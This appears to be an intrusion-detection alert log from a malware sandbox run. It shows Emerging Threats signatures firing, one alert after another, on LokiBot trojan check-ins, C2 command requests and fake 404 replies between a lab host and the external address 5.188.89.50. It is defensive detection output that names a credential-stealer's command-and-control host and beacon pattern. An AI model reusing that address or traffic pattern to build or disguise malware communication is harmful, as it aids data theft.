                    09/28/21-06:50:50.837246TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.225.188.89.50
                    09/28/21-06:50:50.837246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.225.188.89.50
                    09/28/21-06:50:51.200425TCP2025483ET TROJAN LokiBot Fake 404 Response80491935.188.89.50192.168.2.22
                    09/28/21-06:50:51.664554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.225.188.89.50
                    09/28/21-06:50:52.034303TCP2025483ET TROJAN LokiBot Fake 404 Response80491945.188.89.50192.168.2.22
                    09/28/21-06:50:52.442627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.442627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.442627TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.442627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.784750TCP2025483ET TROJAN LokiBot Fake 404 Response80491955.188.89.50192.168.2.22
                    09/28/21-06:50:53.378969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.741503TCP2025483ET TROJAN LokiBot Fake 404 Response80491965.188.89.50192.168.2.22
                    09/28/21-06:50:54.025805TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.384705TCP2025483ET TROJAN LokiBot Fake 404 Response80491975.188.89.50192.168.2.22
                    09/28/21-06:50:54.678868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.225.188.89.50
                    09/28/21-06:50:55.031650TCP2025483ET TROJAN LokiBot Fake 404 Response80491985.188.89.50192.168.2.22
                    09/28/21-06:50:55.313486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.687469TCP2025483ET TROJAN LokiBot Fake 404 Response80491995.188.89.50192.168.2.22
                    09/28/21-06:50:55.987134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.225.188.89.50
                    09/28/21-06:50:56.347594TCP2025483ET TROJAN LokiBot Fake 404 Response80492005.188.89.50192.168.2.22
                    09/28/21-06:50:56.626190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.996386TCP2025483ET TROJAN LokiBot Fake 404 Response80492015.188.89.50192.168.2.22
                    09/28/21-06:50:57.284758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.618108TCP2025483ET TROJAN LokiBot Fake 404 Response80492025.188.89.50192.168.2.22
                    09/28/21-06:50:57.890671TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.225.188.89.50
                    09/28/21-06:50:58.297915TCP2025483ET TROJAN LokiBot Fake 404 Response80492035.188.89.50192.168.2.22
                    09/28/21-06:50:58.583042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.927285TCP2025483ET TROJAN LokiBot Fake 404 Response80492045.188.89.50192.168.2.22
                    09/28/21-06:50:59.242791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.601230TCP2025483ET TROJAN LokiBot Fake 404 Response80492055.188.89.50192.168.2.22
                    09/28/21-06:50:59.885918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.225.188.89.50
                    09/28/21-06:51:00.245923TCP2025483ET TROJAN LokiBot Fake 404 Response80492065.188.89.50192.168.2.22
                    09/28/21-06:51:00.541294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.899846TCP2025483ET TROJAN LokiBot Fake 404 Response80492075.188.89.50192.168.2.22
                    09/28/21-06:51:01.193570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.549927TCP2025483ET TROJAN LokiBot Fake 404 Response80492085.188.89.50192.168.2.22
                    09/28/21-06:51:01.859269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.225.188.89.50
                    09/28/21-06:51:02.235016TCP2025483ET TROJAN LokiBot Fake 404 Response80492095.188.89.50192.168.2.22
                    09/28/21-06:51:02.517045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.885141TCP2025483ET TROJAN LokiBot Fake 404 Response80492105.188.89.50192.168.2.22
                    09/28/21-06:51:03.156873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.512490TCP2025483ET TROJAN LokiBot Fake 404 Response80492115.188.89.50192.168.2.22
                    09/28/21-06:51:03.819481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.225.188.89.50
                    09/28/21-06:51:04.183722TCP2025483ET TROJAN LokiBot Fake 404 Response80492125.188.89.50192.168.2.22
                    09/28/21-06:51:04.459249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.832233TCP2025483ET TROJAN LokiBot Fake 404 Response80492135.188.89.50192.168.2.22
                    09/28/21-06:51:05.091180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.442715TCP2025483ET TROJAN LokiBot Fake 404 Response80492145.188.89.50192.168.2.22
                    09/28/21-06:51:05.699797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.225.188.89.50
                    09/28/21-06:51:06.041813TCP2025483ET TROJAN LokiBot Fake 404 Response80492155.188.89.50192.168.2.22
                    09/28/21-06:51:06.324511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.690603TCP2025483ET TROJAN LokiBot Fake 404 Response80492165.188.89.50192.168.2.22
                    09/28/21-06:51:06.958702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.225.188.89.50
                    09/28/21-06:51:07.319648TCP2025483ET TROJAN LokiBot Fake 404 Response80492175.188.89.50192.168.2.22
                    09/28/21-06:51:07.603166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.964447TCP2025483ET TROJAN LokiBot Fake 404 Response80492185.188.89.50192.168.2.22
                    09/28/21-06:51:08.233327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.589641TCP2025483ET TROJAN LokiBot Fake 404 Response80492195.188.89.50192.168.2.22
                    09/28/21-06:51:08.841041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.225.188.89.50
                    09/28/21-06:51:09.186378TCP2025483ET TROJAN LokiBot Fake 404 Response80492205.188.89.50192.168.2.22
                    09/28/21-06:51:09.444019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.822865TCP2025483ET TROJAN LokiBot Fake 404 Response80492215.188.89.50192.168.2.22
                    09/28/21-06:51:10.077283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.430120TCP2025483ET TROJAN LokiBot Fake 404 Response80492225.188.89.50192.168.2.22
                    09/28/21-06:51:10.687078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.225.188.89.50
                    09/28/21-06:51:11.051528TCP2025483ET TROJAN LokiBot Fake 404 Response80492235.188.89.50192.168.2.22
                    09/28/21-06:51:11.328729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.678843TCP2025483ET TROJAN LokiBot Fake 404 Response80492245.188.89.50192.168.2.22
                    09/28/21-06:51:11.924109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.225.188.89.50
                    09/28/21-06:51:12.290453TCP2025483ET TROJAN LokiBot Fake 404 Response80492255.188.89.50192.168.2.22
                    09/28/21-06:51:12.548479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.908386TCP2025483ET TROJAN LokiBot Fake 404 Response80492265.188.89.50192.168.2.22
                    09/28/21-06:51:13.189129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.544518TCP2025483ET TROJAN LokiBot Fake 404 Response80492275.188.89.50192.168.2.22
                    09/28/21-06:51:13.815165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.225.188.89.50
                    09/28/21-06:51:14.177796TCP2025483ET TROJAN LokiBot Fake 404 Response80492285.188.89.50192.168.2.22
                    09/28/21-06:51:14.436115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.799665TCP2025483ET TROJAN LokiBot Fake 404 Response80492295.188.89.50192.168.2.22
                    09/28/21-06:51:15.070584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.439943TCP2025483ET TROJAN LokiBot Fake 404 Response80492305.188.89.50192.168.2.22
                    09/28/21-06:51:15.726731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.225.188.89.50
                    09/28/21-06:51:16.076317TCP2025483ET TROJAN LokiBot Fake 404 Response80492315.188.89.50192.168.2.22
                    09/28/21-06:51:16.340414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.690124TCP2025483ET TROJAN LokiBot Fake 404 Response80492325.188.89.50192.168.2.22
                    09/28/21-06:51:16.959595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.225.188.89.50
                    09/28/21-06:51:17.307421TCP2025483ET TROJAN LokiBot Fake 404 Response80492335.188.89.50192.168.2.22
                    09/28/21-06:51:17.590103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.941712TCP2025483ET TROJAN LokiBot Fake 404 Response80492345.188.89.50192.168.2.22
                    09/28/21-06:51:18.196433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.572171TCP2025483ET TROJAN LokiBot Fake 404 Response80492355.188.89.50192.168.2.22
                    09/28/21-06:51:18.836329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.225.188.89.50
                    09/28/21-06:51:19.181425TCP2025483ET TROJAN LokiBot Fake 404 Response80492365.188.89.50192.168.2.22
                    09/28/21-06:51:19.451088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.814657TCP2025483ET TROJAN LokiBot Fake 404 Response80492375.188.89.50192.168.2.22
                    09/28/21-06:51:20.085203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.478231TCP2025483ET TROJAN LokiBot Fake 404 Response80492385.188.89.50192.168.2.22
                    09/28/21-06:51:20.743376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.225.188.89.50
                    09/28/21-06:51:21.089639TCP2025483ET TROJAN LokiBot Fake 404 Response80492395.188.89.50192.168.2.22
                    09/28/21-06:51:21.360941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.718506TCP2025483ET TROJAN LokiBot Fake 404 Response80492405.188.89.50192.168.2.22
                    09/28/21-06:51:21.987188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.225.188.89.50
                    09/28/21-06:51:22.352974TCP2025483ET TROJAN LokiBot Fake 404 Response80492415.188.89.50192.168.2.22
